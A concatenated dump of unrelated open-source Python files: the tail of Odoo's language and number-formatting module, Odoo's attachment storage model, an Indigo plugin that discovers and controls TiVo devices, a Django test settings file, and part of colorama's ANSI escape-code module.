if context is None:
context = {}
languages = self.read(cr, uid, ids, ['code','active'], context=context)
for language in languages:
ctx_lang = context.get('lang')
if language['code']=='en_US':
raise osv.except_osv(_('User Error'), _("Base Language 'en_US' can not be deleted!"))
if ctx_lang and (language['code']==ctx_lang):
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is User's Preferred Language!"))
if language['active']:
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is Active!\nPlease de-activate the language first."))
trans_obj = self.pool.get('ir.translation')
trans_ids = trans_obj.search(cr, uid, [('lang','=',language['code'])], context=context)
trans_obj.unlink(cr, uid, trans_ids, context=context)
return super(lang, self).unlink(cr, uid, ids, context=context)
def format(self, cr, uid, ids, percent, value, grouping=False, monetary=False, context=None):
""" Format() will return the language-specific output for float values"""
if percent[0] != '%':
raise ValueError("format() must be given exactly one %char format specifier")
lang_grouping, thousands_sep, decimal_point = self._lang_data_get(cr, uid, ids[0], monetary)
eval_lang_grouping = eval(lang_grouping)
formatted = percent % value
# floats and decimal ints need special action!
if percent[-1] in 'eEfFgG':
seps = 0
parts = formatted.split('.')
if grouping:
parts[0], seps = intersperse(parts[0], eval_lang_grouping, thousands_sep)
formatted = decimal_point.join(parts)
while seps:
sp = formatted.find(' ')
if sp == -1: break
formatted = formatted[:sp] + formatted[sp+1:]
seps -= 1
elif percent[-1] in 'diu':
if grouping:
formatted = intersperse(formatted, eval_lang_grouping, thousands_sep)[0]
return formatted
# import re, operator
# _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?'
# r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]')
lang()
def original_group(s, grouping, thousands_sep=''):
if not grouping:
return s, 0
result = ""
seps = 0
spaces = ""
if s[-1] == ' ':
sp = s.find(' ')
spaces = s[sp:]
s = s[:sp]
while s and grouping:
# if grouping is -1, we are done
if grouping[0] == -1:
break
# 0: re-use last group ad infinitum
elif grouping[0] != 0:
#process last group
group = grouping[0]
grouping = grouping[1:]
if result:
result = s[-group:] + thousands_sep + result
seps += 1
else:
result = s[-group:]
s = s[:-group]
if s and s[-1] not in "0123456789":
# the leading string is only spaces and signs
return s + result + spaces, seps
if not result:
return s + spaces, seps
if s:
result = s + thousands_sep + result
seps += 1
return result + spaces, seps
def split(l, counts):
"""
>>> split("hello world", [])
['hello world']
>>> split("hello world", [1])
['h', 'ello world']
>>> split("hello world", [2])
['he', 'llo world']
>>> split("hello world", [2,3])
['he', 'llo', ' world']
>>> split("hello world", [2,3,0])
['he', 'llo', ' wo', 'rld']
>>> split("hello world", [2,-1,3])
['he', 'llo world']
"""
res = []
saved_count = len(l) # count to use when encoutering a zero
for count in counts:
if not l:
break
if count == -1:
break
if count == 0:
while l:
res.append(l[:saved_count])
l = l[saved_count:]
break
res.append(l[:count])
l = l[count:]
saved_count = count
if l:
res.append(l)
return res
intersperse_pat = re.compile('([^0-9]*)([^ ]*)(.*)')
def intersperse(string, counts, separator=''):
"""
See the asserts below for examples.
"""
left, rest, right = intersperse_pat.match(string).groups()
def reverse(s): return s[::-1]
splits = split(reverse(rest), counts)
res = separator.join(map(reverse, reverse(splits)))
return left + res + right, len(splits) > 0 and len(splits) -1 or 0
# TODO rewrite this with a unit test library
def _group_examples():
for g in [original_group, intersperse]:
# print "asserts on", g.func_name
assert g("", []) == ("", 0)
assert g("0", []) == ("0", 0)
assert g("012", []) == ("012", 0)
assert g("1", []) == ("1", 0)
assert g("12", []) == ("12", 0)
assert g("123", []) == ("123", 0)
assert g("1234", []) == ("1234", 0)
assert g("123456789", []) == ("123456789", 0)
assert g("&ab%#@1", []) == ("&ab%#@1", 0)
assert g("0", []) == ("0", 0)
assert g("0", [1]) == ("0", 0)
assert g("0", [2]) == ("0", 0)
assert g("0", [200]) == ("0", 0)
# breaks original_group:
if g.func_name == 'intersperse':
assert g("12345678", [0], '.') == ('12345678', 0)
assert g("", [1], '.') == ('', 0)
assert g("12345678", [1], '.') == ('1234567.8', 1)
assert g("12345678", [1], '.') == ('1234567.8', 1)
assert g("12345678", [2], '.') == ('123456.78', 1)
assert g("12345678", [2,1], '.') == ('12345.6.78', 2)
assert g("12345678", [2,0], '.') == ('12.34.56.78', 3)
assert g("12345678", [-1,2], '.') == ('12345678', 0)
assert g("12345678", [2,-1], '.') == ('123456.78', 1)
assert g("12345678", [2,0,1], '.') == ('12.34.56.78', 3)
assert g("12345678", [2,0,0], '.') == ('12.34.56.78', 3)
assert g("12345678", [2,0,-1], '.') == ('12.34.56.78', 3)
assert g("12345678", [3,3,3,3], '.') == ('12.345.678', 2)
assert original_group("abc1234567xy", [2], '.') == ('abc1234567.xy', 1)
assert original_group("abc1234567xy8", [2], '.') == ('abc1234567xy8', 0) # difference here...
assert original_group("abc12", [3], '.') == ('abc12', 0)
assert original_group("abc12", [2], '.') == ('abc12', 0)
assert original_group("abc12", [1], '.') == ('abc1.2', 1)
assert intersperse("abc1234567xy", [2], '.') == ('abc1234567.xy', 1)
assert intersperse("abc1234567xy8", [2], '.') == ('abc1234567x.y8', 1) # ... w.r.t. here.
assert intersperse("abc12", [3], '.') == ('abc12', 0)
assert intersperse("abc12", [2], '.') == ('abc12', 0)
assert intersperse("abc12", [1], '.') == ('abc1.2', 1)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
oscarolar/odoo | openerp/addons/base/ir/ir_attachment.py | 4 | 15096 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import hashlib
import itertools
import logging
import os
import re
from openerp import tools
from openerp.tools.translate import _
from openerp.exceptions import AccessError
from openerp.osv import fields,osv
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
class ir_attachment(osv.osv):
"""Attachments are used to link binary files or url to any openerp document.
External attachment storage
---------------------------
The 'data' function field (_data_get,data_set) is implemented using
_file_read, _file_write and _file_delete which can be overridden to
implement other storage engines, shuch methods should check for other
location pseudo uri (example: hdfs://hadoppserver)
The default implementation is the file:dirname location that stores files
on the local filesystem using name based on their sha1 hash
"""
_order = 'id desc'
def _name_get_resname(self, cr, uid, ids, object, method, context):
data = {}
for attachment in self.browse(cr, uid, ids, context=context):
model_object = attachment.res_model
res_id = attachment.res_id
if model_object and res_id:
model_pool = self.pool[model_object]
res = model_pool.name_get(cr,uid,[res_id],context)
res_name = res and res[0][1] or False
if res_name:
field = self._columns.get('res_name',False)
if field and len(res_name) > field.size:
res_name = res_name[:30] + '...'
data[attachment.id] = res_name
else:
data[attachment.id] = False
return data
def _storage(self, cr, uid, context=None):
return self.pool['ir.config_parameter'].get_param(cr, SUPERUSER_ID, 'ir_attachment.location', 'file')
@tools.ormcache()
def _filestore(self, cr, uid, context=None):
return tools.config.filestore(cr.dbname)
def force_storage(self, cr, uid, context=None):
"""Force all attachments to be stored in the currently configured storage"""
if not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise AccessError(_('Only administrators can execute this action.'))
location = self._storage(cr, uid, context)
domain = {
'db': [('store_fname', '!=', False)],
'file': [('db_datas', '!=', False)],
}[location]
ids = self.search(cr, uid, domain, context=context)
for attach in self.browse(cr, uid, ids, context=context):
attach.write({'datas': attach.datas})
return True
# 'data' field implementation
def _full_path(self, cr, uid, path):
# sanitize ath
path = re.sub('[.]', '', path)
path = path.strip('/\\')
return os.path.join(self._filestore(cr, uid), path)
def _get_path(self, cr, uid, bin_data):
sha = hashlib.sha1(bin_data).hexdigest()
# retro compatibility
fname = sha[:3] + '/' + sha
full_path = self._full_path(cr, uid, fname)
if os.path.isfile(full_path):
return fname, full_path # keep existing path
# scatter files across 256 dirs
# we use '/' in the db (even on windows)
fname = sha[:2] + '/' + sha
full_path = self._full_path(cr, uid, fname)
dirname = os.path.dirname(full_path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
return fname, full_path
def _file_read(self, cr, uid, fname, bin_size=False):
full_path = self._full_path(cr, uid, fname)
r = ''
try:
if bin_size:
r = os.path.getsize(full_path)
else:
r = open(full_path,'rb').read().encode('base64')
except IOError:
_logger.error("_read_file reading %s",full_path)
return r
def _file_write(self, cr, uid, value):
bin_value = value.decode('base64')
fname, full_path = self._get_path(cr, uid, bin_value)
if not os.path.exists(full_path):
try:
with open(full_path, 'wb') as fp:
fp.write(bin_value)
except IOError:
_logger.error("_file_write writing %s", full_path)
return fname
def _file_delete(self, cr, uid, fname):
count = self.search(cr, 1, [('store_fname','=',fname)], count=True)
full_path = self._full_path(cr, uid, fname)
if count <= 1 and os.path.exists(full_path):
try:
os.unlink(full_path)
except OSError:
_logger.error("_file_delete could not unlink %s",full_path)
except IOError:
# Harmless and needed for race conditions
_logger.error("_file_delete could not unlink %s",full_path)
def _data_get(self, cr, uid, ids, name, arg, context=None):
if context is None:
context = {}
result = {}
bin_size = context.get('bin_size')
for attach in self.browse(cr, uid, ids, context=context):
if attach.store_fname:
result[attach.id] = self._file_read(cr, uid, attach.store_fname, bin_size)
else:
result[attach.id] = attach.db_datas
return result
def _data_set(self, cr, uid, id, name, value, arg, context=None):
# We dont handle setting data to null
if not value:
return True
if context is None:
context = {}
location = self._storage(cr, uid, context)
file_size = len(value.decode('base64'))
attach = self.browse(cr, uid, id, context=context)
if attach.store_fname:
self._file_delete(cr, uid, attach.store_fname)
if location != 'db':
fname = self._file_write(cr, uid, value)
# SUPERUSER_ID as probably don't have write access, trigger during create
super(ir_attachment, self).write(cr, SUPERUSER_ID, [id], {'store_fname': fname, 'file_size': file_size, 'db_datas': False}, context=context)
else:
super(ir_attachment, self).write(cr, SUPERUSER_ID, [id], {'db_datas': value, 'file_size': file_size, 'store_fname': False}, context=context)
return True
_name = 'ir.attachment'
_columns = {
'name': fields.char('Attachment Name', required=True),
'datas_fname': fields.char('File Name'),
'description': fields.text('Description'),
'res_name': fields.function(_name_get_resname, type='char', string='Resource Name', store=True),
'res_model': fields.char('Resource Model', readonly=True, help="The database object this attachment will be attached to"),
'res_id': fields.integer('Resource ID', readonly=True, help="The record id this is attached to"),
'create_date': fields.datetime('Date Created', readonly=True),
'create_uid': fields.many2one('res.users', 'Owner', readonly=True),
'company_id': fields.many2one('res.company', 'Company', change_default=True),
'type': fields.selection( [ ('url','URL'), ('binary','Binary'), ],
'Type', help="Binary File or URL", required=True, change_default=True),
'url': fields.char('Url', size=1024),
# al: We keep shitty field names for backward compatibility with document
'datas': fields.function(_data_get, fnct_inv=_data_set, string='File Content', type="binary", nodrop=True),
'store_fname': fields.char('Stored Filename'),
'db_datas': fields.binary('Database Data'),
'file_size': fields.integer('File Size'),
}
_defaults = {
'type': 'binary',
'file_size': 0,
'company_id': lambda s,cr,uid,c: s.pool.get('res.company')._company_default_get(cr, uid, 'ir.attachment', context=c),
}
def _auto_init(self, cr, context=None):
super(ir_attachment, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_attachment_res_idx',))
if not cr.fetchone():
cr.execute('CREATE INDEX ir_attachment_res_idx ON ir_attachment (res_model, res_id)')
cr.commit()
def check(self, cr, uid, ids, mode, context=None, values=None):
"""Restricts the access to an ir.attachment, according to referred model
In the 'document' module, it is overriden to relax this hard rule, since
more complex ones apply there.
"""
res_ids = {}
if ids:
if isinstance(ids, (int, long)):
ids = [ids]
cr.execute('SELECT DISTINCT res_model, res_id FROM ir_attachment WHERE id = ANY (%s)', (ids,))
for rmod, rid in cr.fetchall():
if not (rmod and rid):
continue
res_ids.setdefault(rmod,set()).add(rid)
if values:
if values.get('res_model') and values.get('res_id'):
res_ids.setdefault(values['res_model'],set()).add(values['res_id'])
ima = self.pool.get('ir.model.access')
for model, mids in res_ids.items():
# ignore attachments that are not attached to a resource anymore when checking access rights
# (resource was deleted but attachment was not)
mids = self.pool[model].exists(cr, uid, mids)
ima.check(cr, uid, model, mode)
self.pool[model].check_access_rule(cr, uid, mids, mode, context=context)
def _search(self, cr, uid, args, offset=0, limit=None, order=None, context=None, count=False, access_rights_uid=None):
ids = super(ir_attachment, self)._search(cr, uid, args, offset=offset,
limit=limit, order=order,
context=context, count=False,
access_rights_uid=access_rights_uid)
if not ids:
if count:
return 0
return []
# Work with a set, as list.remove() is prohibitive for large lists of documents
# (takes 20+ seconds on a db with 100k docs during search_count()!)
orig_ids = ids
ids = set(ids)
# For attachments, the permissions of the document they are attached to
# apply, so we must remove attachments for which the user cannot access
# the linked document.
# Use pure SQL rather than read() as it is about 50% faster for large dbs (100k+ docs),
# and the permissions are checked in super() and below anyway.
cr.execute("""SELECT id, res_model, res_id FROM ir_attachment WHERE id = ANY(%s)""", (list(ids),))
targets = cr.dictfetchall()
model_attachments = {}
for target_dict in targets:
if not target_dict['res_model']:
continue
# model_attachments = { 'model': { 'res_id': [id1,id2] } }
model_attachments.setdefault(target_dict['res_model'],{}).setdefault(target_dict['res_id'] or 0, set()).add(target_dict['id'])
# To avoid multiple queries for each attachment found, checks are
# performed in batch as much as possible.
ima = self.pool.get('ir.model.access')
for model, targets in model_attachments.iteritems():
if not self.pool.get(model):
continue
if not ima.check(cr, uid, model, 'read', False):
# remove all corresponding attachment ids
for attach_id in itertools.chain(*targets.values()):
ids.remove(attach_id)
continue # skip ir.rule processing, these ones are out already
# filter ids according to what access rules permit
target_ids = targets.keys()
allowed_ids = [0] + self.pool[model].search(cr, uid, [('id', 'in', target_ids)], context=context)
disallowed_ids = set(target_ids).difference(allowed_ids)
for res_id in disallowed_ids:
for attach_id in targets[res_id]:
ids.remove(attach_id)
# sort result according to the original sort ordering
result = [id for id in orig_ids if id in ids]
return len(result) if count else list(result)
def read(self, cr, uid, ids, fields_to_read=None, context=None, load='_classic_read'):
if isinstance(ids, (int, long)):
ids = [ids]
self.check(cr, uid, ids, 'read', context=context)
return super(ir_attachment, self).read(cr, uid, ids, fields_to_read, context, load)
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
self.check(cr, uid, ids, 'write', context=context, values=vals)
if 'file_size' in vals:
del vals['file_size']
return super(ir_attachment, self).write(cr, uid, ids, vals, context)
def copy(self, cr, uid, id, default=None, context=None):
self.check(cr, uid, [id], 'write', context=context)
return super(ir_attachment, self).copy(cr, uid, id, default, context)
def unlink(self, cr, uid, ids, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
self.check(cr, uid, ids, 'unlink', context=context)
for attach in self.browse(cr, uid, ids, context=context):
if attach.store_fname:
self._file_delete(cr, uid, attach.store_fname)
return super(ir_attachment, self).unlink(cr, uid, ids, context)
def create(self, cr, uid, values, context=None):
self.check(cr, uid, [], mode='write', context=context, values=values)
if 'file_size' in values:
del values['file_size']
return super(ir_attachment, self).create(cr, uid, values, context)
def action_get(self, cr, uid, context=None):
return self.pool.get('ir.actions.act_window').for_xml_id(
cr, uid, 'base', 'action_attachment', context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
RogueProeliator/IndigoPlugin-TiVo-Network-Remote | TiVo Network Remote.indigoPlugin/Contents/Server Plugin/plugin.py | 1 | 10778 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# TiVo Network Remote Control by RogueProeliator <rp@rogueproeliator.com>
# Indigo plugin designed to allow control of Series 3+ TiVo devices via control
# pages using TiVo's built-in telnet interface designed for home automation
# (Creston) systems.
#
# Command structure based on work done via the TiVo Community and documented
# here: http://www.tivo.com/assets/images/abouttivo/resources/downloads/brochures/TiVo_TCP_Network_Remote_Control_Protocol_073108.pdf
#
# Version 1.0:
# Initial release of the plugin
# Version 1.1:
# Plugin converted to RPFramework
# Added debug level options & menu item toggle
# Added channel tracking device state
# Added channel selector state/actions
# Version 1.1.6:
# Added Standby IR code
# Changed version check URL
# Version 1.2.8:
# Added better auto-discovery of the TiVo name and software version
# Implement auto-reconnect for disconnected/failed connections
# Version 2.0.1:
# Updated API to use Indigo 7 API calls
#
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Python imports
#/////////////////////////////////////////////////////////////////////////////////////////
import os
import random
import re
import select
import socket
import string
import struct
import telnetlib
import RPFramework
import tivoRemoteDevice
#/////////////////////////////////////////////////////////////////////////////////////////
# Constants and configuration variables
#/////////////////////////////////////////////////////////////////////////////////////////
# beacon template for use when finding TiVo devices or for when attempting to get more
# information about them (name/version)
ANNOUNCE = """tivoconnect=1
method=%(method)s
platform=pc
identity=remote-%(port)x
services=TiVoMediaServer:%(port)d/http
"""
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# Plugin
# Primary Indigo plugin class that is universal for all devices (TiVo instances) to be
# controlled
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
class Plugin(RPFramework.RPFrameworkPlugin.RPFrameworkPlugin):
#/////////////////////////////////////////////////////////////////////////////////////
# Class construction and destruction methods
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Constructor called once upon plugin class creation; setup the device tracking
# variables for later use
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):
# RP framework base class's init method
super(Plugin, self).__init__(pluginId, pluginDisplayName, pluginVersion, pluginPrefs, managedDeviceClassModule=tivoRemoteDevice)
#/////////////////////////////////////////////////////////////////////////////////////
# Data Validation functions... these functions allow the plugin or devices to validate
# user input
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will be called to validate the information entered into the Device
# configuration GUI from within Indigo
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def validateDeviceConfigUiEx(self, valuesDict, deviceTypeId, devId):
# check to see if there are already devices created for this plugin using the same
# IP address
for dev in indigo.devices.iter(u'self'):
if devId != dev.id:
if dev.pluginProps.get(u'tivoIPAddress') == valuesDict[u'tivoIPAddress']:
errorMsgDict = indigo.Dict()
errorMsgDict[u'tivoIPAddress'] = u'Device "' + dev.name + u'" already set to use this IP Address. You cannot have two Indigo devices attached to the same TiVo device.'
return (False, valuesDict, errorMsgDict)
# user input is all valid
return (True, valuesDict)
#/////////////////////////////////////////////////////////////////////////////////////
# Configuration and Action Dialog Callbacks
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will be called from the user executing the menu item action to send
# an arbitrary command code to the Onkyo receiver
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def sendArbitraryCommand(self, valuesDict, typeId):
try:
deviceId = valuesDict.get(u'targetDevice', u'0')
commandCode = valuesDict.get(u'commandToSend', u'').strip()
if deviceId == u'' or deviceId == u'0':
# no device was selected
errorDict = indigo.Dict()
errorDict[u'targetDevice'] = u'Please select a device'
return (False, valuesDict, errorDict)
elif commandCode == u'':
errorDict = indigo.Dict()
errorDict[u'commandToSend'] = u'Enter command to send'
return (False, valuesDict, errorDict)
else:
# send the code using the normal action processing...
actionParams = indigo.Dict()
actionParams[u'commandCode'] = commandCode
self.executeAction(pluginAction=None, indigoActionId=u'sendArbitraryCommand', indigoDeviceId=int(deviceId), paramValues=actionParams)
return (True, valuesDict)
except:
self.exceptionLog()
return (False, valuesDict)
#/////////////////////////////////////////////////////////////////////////////////////
# Utility / helper routines
#/////////////////////////////////////////////////////////////////////////////////////
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine is called back to the plugin when the GUI configuration loads... it
# should allow for selecting a TiVo device via a drop-down
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def findTiVoDevices(self, filter="", valuesDict=None, typeId="", targetId=0):
tcd_id = re.compile('TiVo_TCD_ID: (.*)\r\n').findall
tcds = {}
# we must setup a listening server in order to listen for the TiVo returns, but
# the port does not matter... find an available one
hsock = socket.socket()
attempts = 0
while True:
port = random.randint(0x8000, 0xffff)
try:
hsock.bind(('', port))
break
except:
attempts += 1
if attempts == 7:
# can't bind to a port... return an empty list
return []
hsock.listen(5)
# broadcast an announcement so that the TiVos will respond
method = 'broadcast'
try:
usock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
usock.sendto(ANNOUNCE % locals(), ('255.255.255.255', 2190))
usock.close()
except:
hsock.close()
# the announcement broadcast failed.
return []
# collect the queries made in response; these return quickly
while True:
isock, junk1, junk2 = select.select([hsock], [], [], 1)
if not isock:
break
client, address = hsock.accept()
message = client.recv(1500)
client.close()
tcd = tcd_id(message)[0]
if tcd[0] >= '6' and tcd[:3] != '649': # only support series 3 & 4 TiVos are supported
tcds[tcd] = address[0]
hsock.close()
# unfortunately the HTTP requests don't include the machine names,
# so we find them by making direct TCD connections to each TiVo
tivos = []
for tcd, address in tcds.items():
name, version = self.getTiVoNameAndVersion(address)
tivos.append((address, RPFramework.RPFrameworkUtils.to_unicode(name) + u' (v' + RPFramework.RPFrameworkUtils.to_unicode(version) + u')'))
return tivos
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine will exchange TiVo Connect Discovery beacons in order to extract the
# name and software version
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def getTiVoNameAndVersion(self, address):
method = 'connected'
port = 0
our_beacon = ANNOUNCE % locals()
machine_name = re.compile('machine=(.*)\n').findall
swversion = re.compile('swversion=(\d*.\d*)').findall
try:
tsock = socket.socket()
tsock.connect((address, 2190))
tsock.sendall(struct.pack('!I', len(our_beacon)) + our_beacon)
length = struct.unpack('!I', self.receiveBytesFromSocket(tsock, 4))[0]
tivo_beacon = self.receiveBytesFromSocket(tsock, length)
tsock.close()
self.logger.threaddebug(u'Received beacon: ' + tivo_beacon)
name = machine_name(tivo_beacon)[0]
version = float(swversion(tivo_beacon)[0])
except:
name = address
version = 0.0
if self.debug == True:
self.exceptionLog()
return name, version
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Reads the specified number of bytes from the socket
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def receiveBytesFromSocket(self, sock, length):
block = ''
while len(block) < length:
add = sock.recv(length - len(block))
if not add:
break
block += add
return block
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# This routine may be used by plugins to perform any upgrades specific to the plugin;
# it will be called following the framework's update processing
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def performPluginUpgrade(self, oldVersion, newVersion):
if oldVersion == u'':
pluginBasePath = os.getcwd()
jsonFilePath = os.path.join(pluginBasePath, "json.py")
if os.path.exists(jsonFilePath):
os.remove(jsonFilePath)
self.logger.debug(u'Removed obsolete json.py file')
jsonCompiledFilePath = os.path.join(pluginBasePath, "json.pyc")
if os.path.exists(jsonCompiledFilePath):
os.remove(jsonCompiledFilePath)
self.logger.debug(u'Removed obsolete json.pyc file')
| mit |
askinteractive/mezzanine-advanced-admin | test_mezzanine_advanced_admin/test_mezzanine_advanced_admin/settings.py | 1 | 2566 | """
Django settings for test_mezzanine_advanced_admin project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3!^@q06fn2-zl%2f%rmux58ybi9u=9k_lq^k*+^429foc#7fzn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'bootstrap3',
'mezzanine_advanced_admin',
'filer',
'easy_thumbnails',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'test_mezzanine_advanced_admin',
'CapitalApp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.i18n',
)
ROOT_URLCONF = 'test_mezzanine_advanced_admin.urls'
WSGI_APPLICATION = 'test_mezzanine_advanced_admin.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
ADVANCED_ADMIN_FIELD_RENDERER = 'mezzanine_advanced_admin.renderers.BootstrapFieldRenderer'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| apache-2.0 |
bhairavmehta95/flashcard-helper-alexa-skill | venv/lib/python2.7/site-packages/pip/_vendor/colorama/ansi.py | 640 | 2524 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
'''
This module generates ANSI character codes to printing colors to terminals.
See: http://en.wikipedia.org/wiki/ANSI_escape_code
'''
CSI = '\033['
OSC = '\033]'
BEL = '\007'
def code_to_chars(code):
return CSI + str(code) + 'm'
def set_title(title):
return OSC + '2;' + title + BEL
def clear_screen(mode=2):
return CSI + str(mode) + 'J'
def clear_line(mode=2):
return CSI + str(mode) + 'K'
class AnsiCodes(object):
def __init__(self):
# the subclasses declare class attributes which are numbers.
# Upon instantiation we define instance attributes, which are the same
# as the class attributes but wrapped with the ANSI escape sequence
for name in dir(self):
if not name.startswith('_'):
value = getattr(self, name)
setattr(self, name, code_to_chars(value))
class AnsiCursor(object):
def UP(self, n=1):
return CSI + str(n) + 'A'
def DOWN(self, n=1):
return CSI + str(n) + 'B'
def FORWARD(self, n=1):
return CSI + str(n) + 'C'
def BACK(self, n=1):
return CSI + str(n) + 'D'
def POS(self, x=1, y=1):
return CSI + str(y) + ';' + str(x) + 'H'
class AnsiFore(AnsiCodes):
BLACK = 30
RED = 31
GREEN = 32
YELLOW = 33
BLUE = 34
MAGENTA = 35
CYAN = 36
WHITE = 37
RESET = 39
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 90
LIGHTRED_EX = 91
LIGHTGREEN_EX = 92
LIGHTYELLOW_EX = 93
LIGHTBLUE_EX = 94
LIGHTMAGENTA_EX = 95
LIGHTCYAN_EX = 96
LIGHTWHITE_EX = 97
class AnsiBack(AnsiCodes):
BLACK = 40
RED = 41
GREEN = 42
YELLOW = 43
BLUE = 44
MAGENTA = 45
CYAN = 46
WHITE = 47
RESET = 49
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 100
LIGHTRED_EX = 101
LIGHTGREEN_EX = 102
LIGHTYELLOW_EX = 103
LIGHTBLUE_EX = 104
LIGHTMAGENTA_EX = 105
